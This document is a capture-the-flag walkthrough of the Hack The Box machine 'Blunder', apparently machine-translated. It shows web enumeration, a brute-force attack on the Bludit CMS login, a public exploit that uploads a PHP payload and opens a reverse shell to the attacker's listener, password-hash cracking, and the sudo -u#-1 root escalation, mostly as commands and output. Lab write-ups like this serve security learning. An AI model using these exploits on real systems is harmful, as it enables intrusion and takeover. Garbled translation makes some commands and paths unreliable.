disclaimer
The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.
Service discovery
Chrysene ─(root💀kali)-[~/ blblunder] ├ ─# nmap-sv -pn 10.10.10.191-p-host discovery disabled (-pn). All addresses will be Starting Nmap 7.91 (https://nmap.org) at 2021-12-21 01:34 EST Nmap scan marked 'up' and scan times will be slower Report for 10.10.10.191 Host is up (0.30s latency). Not shown: 998 Filtered Ports PORT STATE SERVICE VERSION 21/ TCP closed FTP 80/ TCP Open HTTP Apache HTTPD 2.4.41 ((Ubuntu)) SERVICE detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) Scanned in 33.09 secondsCopy the codePort 21 has been shut down, only port 80 in one direction. Let’s blow it up.
Blasting directory
└ ─ # python3 dirsearch. Py - e * t - 100 - u _ | http://10.10.10.191. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _) (/ _ _ | | (_ |) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492 Output File: / root/dirsearch/reports / 10.10.10.191 / _21-12-21 _01-37-07. TXT the Error Log: / root/dirsearch _01 / logs/errors - 21-12-21-37-07 log Target: http://10.10.10.191/ [01:37:09] Starting: [01:37:21] 200 - 7KB - /%3f/ [01:37:25] 400 - 304B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [01:37:45] 200 - 955B - /.github/ [01:37:46] 200 - 563B - /.gitignore [01:38:28] 200 - 7KB - /0 [01:38:55] 200 - 1KB - /LICENSE [01:39:00] 200 - 3 KB - / README. Md [01:39:59] - 3 KB - 200 / about [01:40:23] 301-0 b - / admin - > http://10.10.10.191/admin/ [01:40:32] 200 - 2KB - /admin/ [01:43:38] 400 - 304B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [01:45:44] 200 - 30B - /install.php [01:48:07] 200 - 22B - /robots.txt [01:48:16] 403 - 277B - /server-status/ [01:48:16] 403 - 277B - /server-status [01:49:19] 200 - 118B - /todo.txtCopy the codeUsually I’ll blow it up again with the Gobuster
├ ─# gobuster dir -w /usr/share/wordlists/ web-content /common.txt -u http://10.10.10.191 -t 30 --no-error = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = Gobuster v3.1.0 by OJ Reeves (@ TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.191 [+] Method: GET [+] Threads: 30 [+] Wordlist: /usr/share/wordlists/ web-content /common.txt [+] Negative Status codes: 404 [+] User Agent: GoBuster /3.1.0 [+] Timeout: 10s =============================================================== 2021/12/21 01:51:39 Starting gobuster in directory enumeration mode =============================================================== /.htpasswd (Status: 403) [Size: 277] /. Git/logs/(Status: 301) [Size: 0] [-- -- > http://10.10.10.191/.git/logs] /. Htaccess file (Status: 403) [Size: 277] /.gitignore (Status: 200) [Size: 563] /.hta (Status: 403) [Size: 277] /0 (Status: 200) [Size: 7562] /LICENSE (Status: 200) [Size: 1083] /about (Status: 200) [Size: 3281] /admin (Status: 301) [Size: [0] - > http://10.10.10.191/admin/] / cgi - bin/(Status: 301) [Size: 0] [--> http://10.10.10.191/cgi-bin] /robots.txt (Status: 200) [Size: 22] /server-status (Status: 403) [Size: 277] =============================================================== 2021/12/21 01:53:33 Finished = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =Copy the codeCombined with the results of the two explosions one by one to see the files and directories we are interested in
README.md
ludit](https://www.bludit.com/) ================================ **Simple**, **Fast** and **Flexible** CMS. Bludit is a web application to build your own **website** or **blog** in seconds, it's completely **free and open source**. Bludit uses files in JSON format to store the content, you don't need to install or configure a database. You only need a web server with PHP support. Bludit is a **Flat-File** CMS. Bludit supports **Markdown** and **HTML code** for the content. - [Plugins](https://plugins.bludit.com) - [Themes](https://themes.bludit.com) - [Documentation](https://docs.bludit.com) - Help and Support [Forum](https://forum.bludit.org) and [Chat](https://gitter.im/bludit/support)Copy the codeGet the CMS name: Bludit
todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
Copy the codeFTP is confirmed to have been turned off by the author. CMS upgrade not completed, implying a bug, fergus may be a user name.
Search for the CMS utilization code
┌ ─ ─ (root 💀 kali) - ~ / HTB/Blunder └ ─ # searchsploit Bludit ------------------------------------------------------------------------------------------------------------------------ ---------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------ ---------------------------------------------------------------------------------- --------------------------------- Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass | PHP/webapps / 48746. The rb Bludit - Directory Traversal Image File Upload (Metasploit) | PHP/remote / 47699. The rb Bludit 3.9.12 - Directory Traversal | PHP/webapps / 48568. Py Bludit 3.9.2 - Auth Bruteforce Bypass | PHP/webapps / 48942. Py Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit) | PHP/webapps / 49037. Rb Bludit 3.9.2 - Directory Traversal | multiple/webapps / 48701. TXT Bludit Pages Editor 3.0.0 - Arbitrary File Upload | php/webapps/46060.txt ------------------------------------------------------------------------------------------------------------------------ ---------------------------------------------------------------------------------- --------------------------------- Shellcodes: No ResultsCopy the codeThere is a violence enumeration vulnerability. Copy 48942.py locally and save Fergus to user.txt
┌ ─ ─ (root 💀 kali) - ~ / HTB/Blunder └ ─ # python3 48942. Py - l http://10.10.10.191/admin/login.php - u. / user. TXT - p /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt [*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX [◣] Brute Force: Testing -> Fergus :123456 [our r company] Brute Force: Testing -> FERGus :123456789 [../.....] Brute Force: Testing -> fergus:picture1 [.] Brute Force: Testing -> fergus:password [b] Brute Force: Fergus :12345678 [←] Brute Force: Testing -> Fergus :111111 [┬] Brute Force: Fergus: % Testing -> Fergus :123123 [▖] Brute Force: Testing -> Fergus :12345 [%] Working experience Fergus :1234567890 [Brute Force: monitoring -> Fergus: Brute Force [o] Brute Force: └ -> Fergus :1234567 [└] Brute Force: └ -> Fergus: Qwerty [o] Brute Force: Testing -> Fergus :abc123 [┬] Brute Force: Testing -> Fergus :Million2 [├] Brute Force: Fergus :000000 [] Brute Force: Testing -> Fergus :1234 [] Brute Force: Fergus: Iloveyou [◑] Brute Force: Testing -> Fergus: Aaron431 [\] Brute Force: Our r company Brute Force: -- > Fergus :password1 [our r company] Brute Force: -- > Fergus :qqww1122 [Brute Force] Fergus :123 [p] Brute Force: Testing -> Fergus :omgpop [◣] Brute Force: Testing -> Fergus :123321 [..\.....] Brute Force: Testing -> Fergus :654321 [-] Brute Force: Testing -> Fergus: Qwertyuiop [▆] Brute Force: Fergus: QWER123456 [∧] Brute Force: Testing -> Fergus :123456a [o] Brute Force: Fergus: A123456 [emirates] Brute Force: Emirates -> Fergus :666666 [◣] Brute Force: Fergus: AsDFghjkl [/] Brute Force: Testing -> Fergus: ASHLEY [▗] Brute Force: Fergus :987654321 [▘] Brute Force: Testing -> Fergus :RolandDeschain [*] SUCCESS!! [+] Use Credential -> fergus:RolandDeschainCopy the codeGet CMS login credentials: Fergus :RolandDeschain
The initial shell
The CMS also has an upload vulnerability, but the payload on Kali requires MSF, which we don’t want to use
Cve-2019-16113 is the version number of exp in MSF. This POC is available on Github
According to the steps of poc utilization, RolandDeschain is first saved in the pass file
Start a listener
nc -lnvp 4242
Perform poc
┌ ─ ─ (root 💀 kali) - ~ / HTB/Blunder └ ─ # python3 poc. Py _ ______ _____ _____ _____ | __ \ | | | ___ \ / __ \ | ___ | | | \ / ___ | | _ | | _ / / | \ | | __ | | __ / __ / __ | | / | | | __ | | | _ \ \ __ / | _ _ | | \ \ | \ __ / \ | | ___ \ _____ / ___ | \ __ _ _ - | \ | (_) \____/\____/ This exploit combines CVE-2019-17240 & CVE-2019-16113 to gain remote shell on target. Created by: Kisho64 (@h_A_M_i__) Enter target URL (i.e. https://target.com): http://10.10.10.191 [~] Enter Listener's IP address: 10.10.14.3 [~] Enter listener's port: 4242 [...] Checking if the target is live... [ + ] The target is live! We are good to go... [ ~ ] Should I bruteforce username? [Y/N]: N [ ~ ] What username should I use? (leave this to use admin as username): fergus [ ~ ] Enter the location for password list: /root/htb/Blunder/pass [ * ] Tried: RolandDeschain [ + ] Creds found: fergus:RolandDeschain [...] Attempting to login now... [ + ] Login succeed... We are good to go :) [ + ] The payload mYTcGvAwRD.php has been uploaded... [ + ] The payload .htaccess has been uploaded... [...]. Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/mYTcGvAwRD.php [+] You should be getting a shell by now, If not open http://10.10.10.191/bl-content/tmp/mYTcGvAwRD.phpCopy the codeGet the initial shell
Chrysene ─(root💀kali)-[~/ Blunder] ├ ─# nG-blblunder listening on [any] Blunder... Connect to [10.10.14.3] from (UNKNOWN) [10.10.10.191] 46044 bash: Cannot set terminal Process group (1279): Inappropriate ioctl for device bash: No job control in this shell www-data@blunder:/var/www/bludit-3.9.2/bl-content/ TMP $id id uid=33(www-data) Gid = 33 (WWW - data) groups = 33 (WWW - data) WWW - data @ blunder: / var/WWW/bludit - 3.9.2 / bl - the content/TMP $Copy the codeThe right to Hugo
User.txt under the Hugo user, we do not have permission to view
In the file/var/WWW/bludit – 3.10.0 a/bl – the content/databases/users. PHP find Hugo md5 password: faca404fd5c0a31cf1897b823c695c85cffeb98d
WWW - data @ blunder: / var/WWW/bludit - 3.9.2 / bl - kernel/admin/controllers $cat / var/WWW/bludit - 3.10.0 a/bl - the content/databases/users. PHP < r/WWW/bludit - 3.10.0 a/bl - the content/databases/users. <? PHP php defined('BLUDIT') or die('Bludit CMS.'); ? > { "admin": { "nickname": "Hugo", "firstName": "Hugo", "lastName": "", "role": "User", "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d", "email": "", "registered": "2019-11-27 07:40:55", "tokenRemember": "", "tokenAuth": "b380cb62057e9da47afce66b4615107d", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "instagram": "", "codepen": "", "linkedin": "", "github": "", "gitlab": ""} }Copy the codeThe result is Password120
Transfer rights to Hugo’s account:
www-data@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$su Hugo su Hugo Password: Password120 id uid=1001(hugo) gid=1001(hugo) groups=1001(hugo) whoami hugoCopy the codeRight to mention
View Hugo privilege information
hugo@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$sudo -l sudo -l Password: Password120 Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User hugo may run the following commands on blunder: (ALL, ! root) /bin/bashCopy the codeYou can raise weights directly to root
hugo@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ sudo -u#-1 /bin/bash
<2/bl-kernel/admin/controllers$ sudo -u#-1 /bin/bash
root@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers# whoami
whoami
root
Copy the code